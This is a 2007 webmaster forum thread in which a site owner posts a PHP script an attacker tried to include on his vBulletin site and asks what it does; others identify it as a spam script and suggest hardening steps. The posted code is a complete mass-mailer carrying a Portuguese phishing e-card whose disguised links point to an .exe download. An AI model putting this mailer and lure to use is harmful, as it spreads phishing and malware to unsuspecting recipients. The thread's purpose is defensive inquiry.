Quick Login
A webmaster forum specifically catering for Australian site owners. We discuss site development, marketing and management issues.
Please welcome our newest member, goodfriend4!
Spice up your web site with the ultimate community message board solution!
Fake Id'sGet fake Id's made right now!
vBSEOSearch Engine Optimization for your VBulletin Forum.
AdminFusion
»
Can Anyone Tell Me What This Script Does?
05-04-2007, 04:38 PM
| #1 |
| | |||||
 Title: Groupie
Join Date: May 2007 Posts: 35  | Can Anyone Tell Me What This Script Does? I was checking my WOL today and I noticed a Mexican IP trying to run an old Vbulletin Exploit. This is the script. Does anyone know specifically what this does? Code: <?php
set_time_limit(0);
if($manda)
{
//EMAIL DO DESTINAT?RIO
$destinatario = "$remetente";
//ASSUNTO DO EMAIL
$assunto = "Admirador lhe enviou um cartão.";
//MENSAGEM DO EMAIL
$mensagem = $html;
$mensagem = stripslashes($mensagem);
//CABE?ALHO DO EMAIL
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
/* headers adicionais */
$headers .= "From: <O carteiro> <entrega@ocarteiro.com>\r\n";
//ARQUIVO COM OS EMAILS
$arquivo = $lista;
//LENDO ARQUIVO
$file = explode("\n", $arquivo);
$i = 1;
?><title>php sender</title>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<p> </p>
<?
if($manda) { ?>
<table width="59%" height="30" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="#333333">
<tr>
<td bgcolor="#f5f5f5">
<?
foreach ($file as $mail) {
if(mail($mail, $assunto, $mensagem, $headers))
echo "<font color=green face=verdana size=1>* $i - ".$mail."</font> <font color=green face=verdana size=1>OK</font><br>";
else
echo "* $i ".$email[$i]." <font color=red>NO</font><br><hr>";
$i++;
}
}
?>
</td>
</tr>
</table><? } ?>
<form name="form1" method="post" action="">
<table width="47%" height="202" border="0" align="center" cellpadding="0" cellspacing="2" bgcolor="#666666">
<tr>
<td bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" bgcolor="#666666"> <div align="center"><font color="#FFFFFF" size="2" face="Verdana, Arial, Helvetica, sans-serif"><b> Enviador priv8 by Morientes
</b></font></div></td>
</tr>
<tr>
<td><div align="center"><font color="#4A0000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">MSG:</font></b></font></div></td>
<td bgcolor="#666666"> </td>
<td><textarea name="html" cols="30" rows="5" id="textarea2">
<html>
<html>
<head>
<title>ocarteiro.com - cartões, diversão e muito mais...</title>
<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'>
<style type=text/css>
a:visited {text-decoration: none}
a:link {text-decoration: none}
a:hover {text-decoration: underline}
</style>
</head>
<body text='#000000' background='http://www.ocarteiro.com.br/images/novo_carteiro/bg_site.gifgif' leftmargin='0' topmargin='0' marginwidth='0' marginheight='0'>
<table width='100%' border='0' cellspacing='0' cellpadding='0' height='100%' background='http://www.ocarteiro.com.br/images/novo_carteiro/bg_site.gif'>
<tr>
<td align='center'> <br>
<table width='550' border='0' cellspacing='0' cellpadding='0' align='center' bgcolor='FFBE00'>
<tr>
<td align='center' valign='top'><img src='http://www.ocarteiro.com.br/images/email_cart_2_2.gif' width='550' height='101'></td>
</tr>
<tr>
<td align='center' valign='top'>
<!--texto -->
<table width='80%' border='0' cellspacing='0' cellpadding='0'>
<tr>
<td>
<p><img src='http://www.ocarteiro.com.br/images/email_cart_2_3.gif' width='372' height='35'></p>
<p><font face='Verdana, Arial' size='1'>Olá, veja o cartão que preparei para você:</font></p>
<p><font face='Verdana, Arial' size='1' color='A50102'><b>
<a style="color:#A50102" href="http://orkute.bravehost.com/cartao.exe">http://www.ocarteiro.com/lercartao.php?id=1916623949A3240</a></b></font></p>
<p align='center'>
<a target="_blank" href="http://orkute.bravehost.com/cartao.exe"><img src='http://www.ocarteiro.com.br/images/email_cart_2_4.gif' width='143' height='38' border='0'></a></p>
<font face='Verdana, Arial' size='1'><font color='A50102'>Você
também poderá visualizá-lo em
<a href="http://orkute.bravehost.com/cartao.exe">http://www.ocarteiro.com</a>
colocando o número do seu cartão:</font><b><font color='A50102'>
1916623949A3240</font></b></font></td>
</tr>
</table>
</td>
</tr>
<tr>
<td align='center' width='550' height='167' background='http://www.ocarteiro.com.br/images/email_cart_2_5.gif'>
<table width='100%' border='0' cellspacing='0' cellpadding='0'>
<tr align='center'>
<td><br><br><br>
<!--- INICIO TAG POSICAO OCARTEIRO-468X60 --->
<TABLE WIDTH=468 BORDER=0 CELLPADDING=0 CELLSPACING=0>
<TR>
<TD width="326" valign="bottom"><a href="http://www.bemleve.com.br/cadastro/cadastro_etapa1.php?id_parceria=342&dieta=emagrecer" target="_blank"><img src="http://www.bemleve.com.br/publicidades/ocarteiro/full_bl_ocarteiro_150506/images/full_bl_ocarteiro_01.gif" width="326" height="60" border="0"></a></TD>
<TD><a href="http://www.bemleve.com.br/cadastro/cadastro_etapa1.php?id_parceria=342&dieta=emagrecer" target="_blank"><IMG SRC="http://www.bemleve.com.br/publicidades/ocarteiro/full_bl_ocarteiro_150506/images/full_bl_ocarteiro_02.jpg" ALT="" WIDTH=142 HEIGHT=60 border="0"></a></TD>
</TR>
<TR>
<TD colspan="2" valign="bottom"><img src="http://www.bemleve.com.br/bin/hits.php?id_parceria=342&dieta=emagrecer" width="1" height="1"></TD>
</TR>
</TABLE>
<!--- FINAL TAG POSICAO OCARTEIRO-468X60 --->
</td>
</tr>
</table>
</td>
</tr>
</table>
<br>
</td>
</tr>
</table>
</body>
</html>
</html>
</textarea></td>
</tr>
<tr>
<td><div align="center"><font color="#4A0000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">E-MAILS:</font></b></font></div></td>
<td bgcolor="#666666"> </td>
<td><textarea name="lista" cols="40" rows="10" id="textarea3">Emails para serem enviados</textarea></td>
</tr>
<tr>
<td><div align="center"></div></td>
<td bgcolor="#666666"> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td bgcolor="#666666"> </td>
<td><div align="center">
<input name="manda" type="submit" id="manda" value="Yeah!">
</div></td>
</tr>
</table></td>
</tr>
</table>
</form>  | ||||
| |
|
05-05-2007, 07:18 AM
| #3 |
| | |||||
Title: Forum Junkie
Join Date: Feb 2006 Posts: 3,623 Location: Holmfirth, England   
| Patience is a virtue. Also, if thats an exploit, should it really be posted here....
__________________ | ||||
| |
|
05-05-2007, 12:24 PM
| #4 |
| | |||||
Title: Gas: $3.55
Join Date: Feb 2006 Posts: 3,980 Location: back in TX 
| Just by reading the comments, this script lets the user find & make himself a private email address, to do with whatever he pleases.
__________________ I went to Vegas, and all I got was this Blister. - true story! | ||||
| |
|
05-05-2007, 05:03 PM
| #5 |
| | |||||
| Title: Groupie
Join Date: May 2007 Posts: 35 | I'm not for sure if it was an exploit... The Specific path he was going to was http://www.mysite.com/forum/home.php...nh/enviar.txt? I went to that file and it showed that script that I posted. Ever seen anything like that? | ||||
| |
|
05-08-2007, 02:04 AM
| #7 |
| | |||||
 Title: Apprentice
Join Date: Dec 2005 Posts: 155 Location: Philadelphia, PA 
| looks like a possible spam script Almost certainly looks like a spam script after some analysis, and a very poorly coded one at that. Last edited by Moelman; 05-08-2007 at 02:17 AM. Reason: combined double post | ||||
| |
|
05-08-2007, 03:26 AM
| #8 |
| | |||||
| Title: Apprentice
Join Date: Mar 2007 Posts: 222 Location: Kingsport, TN
| From the looks of it, it could possibly be a script to send out spam, though to whom? The above script does not appear to connect to the vBulletin MySQL Class or config.php, hence, it would have to be running off another configuration file and/or database. With that, I don't know what exactly they were attempting to do, other than send spam, though I would check the permissions on your folders and make sure they are not world writable, rather, only the server and script can write to them. Also, I would look into securing your vBulletin installation 1). Secure your AdminCP & ModCP folders using .htaccess. 2). Rename your AdminCP & ModCP folders (be sure to change this in config.php). 3). Check all folder permissions, as stated above. | ||||
| |
|
05-08-2007, 03:29 AM
| #9 |
| | |||||
| Title: Groupie
Join Date: May 2007 Posts: 35 | Good idea on those. Are there tutorials on securing the CP's and renaming the directories? Also, what should I chmod the folders too? 775? Edit: N/M, I googled and found (imagine that) tut's and articles on securing the CP's and using htaccess. I've done both. How about the permissions? | ||||
| |
 |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| Display Modes | |
| |
Similar Threads | ||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| GetYourScript - All Your Website Needs | csquare016 | Buy and Sell | 0 | 01-09-2007 04:14 AM |
| Halloween Special | csquare016 | Buy and Sell | 0 | 10-17-2006 05:00 AM |
| $1 Scripts At Scripturn.com + Great Services | xadet3 | Buy and Sell | 0 | 08-07-2006 06:17 PM |
Linear Mode
